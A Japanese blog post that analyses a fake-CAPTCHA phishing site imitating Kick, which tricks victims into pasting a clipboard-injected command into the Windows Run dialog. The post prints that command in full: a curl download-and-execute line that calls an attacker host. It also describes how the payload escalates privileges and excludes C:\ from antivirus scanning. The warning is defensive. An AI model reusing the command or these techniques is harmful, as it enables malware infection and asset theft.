朝、いくつかのグループのチャット記録を見ました。それは、偽のフィッシング Web サイトにアクセスし、コンピューターがトロイの木馬に感染し、資産が盗まれたという内容でした。彼が盗まれる過程を分析してみましょう。

上記のチャット記録に示されているように、彼は次の URL の偽のキック Web サイトにアクセスしました: https://kick.com.im/

重要な注意事項: これはフィッシング Web サイトです。アクセスしないでください。 ！ ！これはフィッシング Web サイトです。アクセスしないでください。 ！ ！これはフィッシング Web サイトです。アクセスしないでください。 ！ ！

この Web サイトにアクセスすると、それが人間であるかどうかの確認が行われることがわかります。確認するためにクリックすると、次のプロンプトが表示されます。

上の図で何をする必要があるかを説明しましょう。

1. Windows + R を押して、[ファイル名を指定して実行] ダイアログ ボックスを開きます。

Windows + R は、Windows システムのショートカット コマンドであり、[ファイル名を指定して実行] ダイアログ ボックスをすばやく開くために使用されます。ここで、悪意のあるスクリプト ファイルを実行する準備が整います。

2. CTRL+V を押して確認テキストを貼り付けます。

CTRL+V が貼り付けに使用されることは誰もが知っています。CTRL+V を押す前に、コピーせずに貼り付ける必要があるのはなぜですか?

フィッシング Web サイトのフロントエンド コードを見てみましょう。

秘密はここにあります。私たちが最初に Web サイトにアクセスしたとき、私たちが人間であるかどうかを確認するために、マウスをクリックする必要があることを思い出してください。が見つかると、悪意のあるスクリプトが自動的にペーストボードにコピーされます。このとき、CTRL+C を使用せずに直接 CTRL+V を押すことができます。

それでは、ペーストボード内の悪意のあるコードとは何でしょうか?

cmd /c "curl -k -L -Ss https://hcaptcha.ru/r -o "%TEMP%\ 1.cmd" && "%TEMP%\ 1.cmd"" # OK または ENTER を押して検証を完了します[OK] を押すと、自分がロボットではないことが確認されます。

上記のコードは https://hcaptcha.ru/r からの意味です(重要な注意事項: これはフィッシング Web サイトです。アクセスしないでください。!!! これはフィッシング Web サイトです。アクセスしないでください。!!! これはフィッシング Web サイトです。アクセスしないでください!!! ) ファイルをダウンロードし、ファイル名を「1.cmd」として一時ディレクトリに保存し、このファイルを実行します。

ダウンロードしたファイルを開き、次のコードを見つけます。

この悪意のあるコードは、まず管理者権限があるかどうかを確認し、管理者権限がある場合は、スクリプトを管理者権限に昇格させようとします。

コードの 2 番目の部分は Base 64 でエンコードされており、デコードすると C:\ がウイルス対策スキャンから除外されることが判明しました。この手順の目的は、ウイルス対策ソフトウェアに「C:|スキャンしないでください!」と指示し、トロイの木馬が C ドライブで実行されたときにウイルス対策ソフトウェアによって検出されないようにすることです。

コードの 3 番目の部分である gpt は解析されていません。一般的な目的は、トロイの木馬を Web サイトから C ドライブにダウンロードして実行することです。これには、 @evilcosなどのセキュリティ専門家による詳細な分析が必要です。

上記のフィッシング詐欺から次のような経験が得られます。

1. 見慣れないウェブサイトにアクセスする前に、そのウェブサイトが正しいかどうか必ずご確認ください。上記の被害者のように、フィッシング Web サイトをキック ライブ ブロードキャストの URL と間違えました。キックの公式 URL はhttps://kick.com/です。被害者が Google で検索したり、gpt について尋ねたりしても、騙されることはありません。

2. 各操作を実行する前に、その操作の目的を理解する必要があります。理解できない場合や不明な場合は、GPT などの AI ツールを使いこなす必要があります。

Web3 には罠がたくさんありますが、皆さんにはそれを避けていただきたいと思います。